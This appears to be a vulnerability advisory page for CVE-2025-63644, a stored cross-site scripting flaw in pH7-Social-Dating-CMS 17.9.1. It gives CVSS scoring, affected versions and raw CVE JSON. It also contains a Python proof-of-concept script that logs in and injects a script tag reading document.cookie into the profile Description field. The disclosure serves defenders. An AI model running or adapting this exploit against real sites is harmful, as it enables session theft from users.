Security Vulnerability Report
中文
CVE-2025-63644 CVSS 5.4 MEDIUM

CVE-2025-63644

Published: 2026-01-14 18:16:42
Last Modified: 2026-01-23 14:44:05

Description

A stored cross-site scripting (XSS) vulnerability exists in pH7Software pH7-Social-Dating-CMS 17.9.1 in the user profile Description field.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:ph7builder:ph7_social_dating_builder:17.9.1:-:*:*:*:*:*:* - VULNERABLE
pH7-Social-Dating-CMS 17.9.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import re # CVE-2025-63644 PoC - Stored XSS in pH7-Social-Dating-CMS Description field # Target: pH7-Social-Dating-CMS 17.9.1 TARGET_URL = "http://target-site.com" USERNAME = "attacker_account" PASSWORD = "attacker_password" # Malicious XSS payload XSS_PAYLOAD = "<script>alert(document.cookie)</script>" def login(): """Authenticate and obtain session cookies""" session = requests.Session() login_url = f"{TARGET_URL}/user/login" data = {"username": USERNAME, "password": PASSWORD} resp = session.post(login_url, data=data) return session if "success" in resp.text else None def inject_xss(session): """Inject XSS payload into user profile Description field""" profile_url = f"{TARGET_URL}/user/profile/edit" data = {"description": XSS_PAYLOAD} resp = session.post(profile_url, data=data) return "success" in resp.text def verify_xss(session): """Verify XSS payload is stored and reflected""" profile_url = f"{TARGET_URL}/user/profile/{USERNAME}" resp = session.get(profile_url) return XSS_PAYLOAD in resp.text # Execute PoC session = login() if session and inject_xss(session) and verify_xss(session): print("[+] XSS payload successfully injected!") print(f"[+] Target profile: {TARGET_URL}/user/profile/{USERNAME}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63644", "sourceIdentifier": "[email protected]", "published": "2026-01-14T18:16:41.560", "lastModified": "2026-01-23T14:44:04.513", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stored cross-site scripting (XSS) vulnerability exists in pH7Software pH7-Social-Dating-CMS 17.9.1 in the user profile Description field."}, {"lang": "es", "value": "Una vulnerabilidad de cross-site scripting (XSS) almacenada existe en pH7Software pH7-Social-Dating-CMS 17.9.1 en el campo Descripción del perfil de usuario."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ph7builder:ph7_social_dating_builder:17.9.1:-:*:*:*:*:*:*", "matchCriteriaId": "13929C84-DF39-4EEC-9DE0-77E96A492E90"}]}]}], "references": [{"url": "https://drive.google.com/drive/folders/1mYDvUTnlTPCGTB-7tHD3pmu_wHtlMVRP", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://medium.com/@rudranshsinghrajpurohit/cve-2025-63644-stored-cross-site-scripting-xss-vulnerability-in-ph7-social-dating-cms-23ed0e7eb853", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}